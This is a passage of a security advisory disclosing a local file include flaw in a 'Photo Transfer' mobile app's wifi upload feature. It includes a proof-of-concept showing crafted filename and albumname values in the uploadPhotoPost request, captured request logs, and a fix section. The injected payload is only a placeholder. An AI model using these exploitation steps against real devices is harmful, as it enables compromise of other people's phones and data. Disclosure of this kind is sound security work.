Remote attackers are able to inject\r\nown files with malicious `filename or albumname` values in the `uploadPhotoPost` POST method request to compromise the mobile web-application.\r\nThe local file/path include execution occcurs in the index dir listing of the wifi interface context. The attacker is able to inject the local\r\nfile include request by usage of the `wifi interface` in connection with the vulnerable upload request.\r\n \r\nRemote attackers are also able to exploit the filename/albumname validation issue in combination with persistent injected script codes to execute\r\ndifferent local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST.\r\n \r\nThe security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.3.\r\nExploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation\r\nof the local file include web vulnerability results in mobile application or connected device component compromise.\r\n \r\n \r\nRequest Method(s):\r\n [+] [POST]\r\n \r\nVulnerable Module(s):\r\n [+] uploadPhotoPost\r\n \r\nVulnerable Parameter(s):\r\n [+] filename & albumname\r\n \r\nAffected Module(s):\r\n [+] Index Path Dir Listing (http://localhost/)\r\n \r\n \r\nProof of Concept (PoC):\r\n=======================\r\nThe local file include web vulnerability can be exploited by local wifi attackers in the network without privileged application user account or user interaction.\r\nFor security demonstration or to reproduce the security vulnerability follow the provided information or steps below to continue.\r\n \r\n \r\nPoC: Url\r\nhttp://localhost/./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!]\r\n \r\n \r\nPoC: Exploit Photo Transfer.htm\r\n \r\n<div class="album-title">>"./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png</div>\r\n<a href="/group/1/0/100"><img class="album-overlay" alt="" width="140" height="160" src="/cvab-overlay.png"> \r\n<img class="album-thumb" width="90" height="90" alt="" src="/api/group/poster/1"> </a>\r\n <!-- <div class="album-folder-img"><img alt="" width="140" height="160" src="/cvab.png"></div> -->\r\n </div>\r\n </div>\r\n </div>\r\n <!--end of preview thumbnails -->\r\n </div>\r\n <!-- end of wrapper-->\r\n <div id="upload" class="wrapper">\r\n <div id="intro">\r\n <div class="col-1 padding-t20">\r\n <!-- <h1><a href="/uploadPage"><img src="/upload.png" alt="" width="76" height="76"><br><br> -->\r\n <!-- UPLOAD</a></h1> -->\r\n <!-- <h2 class="center">Photos FROM This Computer</h2> -->\r\n </div>\r\n </div>\r\n </div>\r\n <!-- end of wrapper-->\r\n <div id="container">\r\n <div id="bg">\r\n </div>\r\n </div>\r\n <!-- end of container and background-->\r\n <div class="menu-bg ui-dark rad-0 center">\r\n <div class="logo">\r\n <a href="/groups">Photo Transfer +</a></div>\r\n </div>\r\n <!-- menu -->\r\n </body>\r\n</html>\r\n</iframe></div>\r\n \r\n \r\n \r\n--- PoC Session Logs [POST] ---\r\nStatus: 200[OK]\r\nPOST http://localhost/uploadPhotoPost Load Flags[LOAD_BYPASS_CACHE ] Gr\ufffd\ufffde des Inhalts[7] Mime Type[application/x-unknown-content-type]\r\n Request Header:\r\n Host[localhost]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Accept-Language[de,en-US;q=0.7,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n Referer[http://localhost/uploadpage]\r\n Content-Length[818]\r\n Content-Type[multipart/form-data; boundary=---------------------------4611772826829]\r\n Cookie[plupload_ui_view=thumbs]\r\n Connection[keep-alive]\r\n Pragma[no-cache]\r\n Cache-Control[no-cache]\r\n POST-Daten:\r\n POST_DATA[-----------------------------4611772826829\r\nContent-Disposition: form-data; name="name"\r\n \r\n./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png\r\n-----------------------------4611772826829\r\nContent-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png"\r\nContent-Type: image/png\r\n \r\n \r\nStatus: 200[OK]\r\nGET http://localhost/main/home Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr\ufffd\ufffde des Inhalts[210] Mime Type[application/x-unknown-content-type]\r\n Request Header:\r\n Host[localhost]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Accept-Language[de,en-US;q=0.7,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n Referer[http://localhost/uploadpage]\r\n Cookie[plupload_ui_view=thumbs]\r\n Connection[keep-alive]\r\n Response Header:\r\n Accept-Ranges[bytes]\r\n Content-Length[210]\r\n Connection[keep-alive]\r\n Date[Tue, 16 Sep 2014 15:07:38 GMT]\r\n \r\n \r\n \r\nSolution - Fix & Patch:\r\n=======================\r\nThe security vulnerability can be patched by a secure parse and encode of the file name value in the upload POST method request or sync.\r\nEncode the file dir listing names and data output values to prevent further file include attacks.
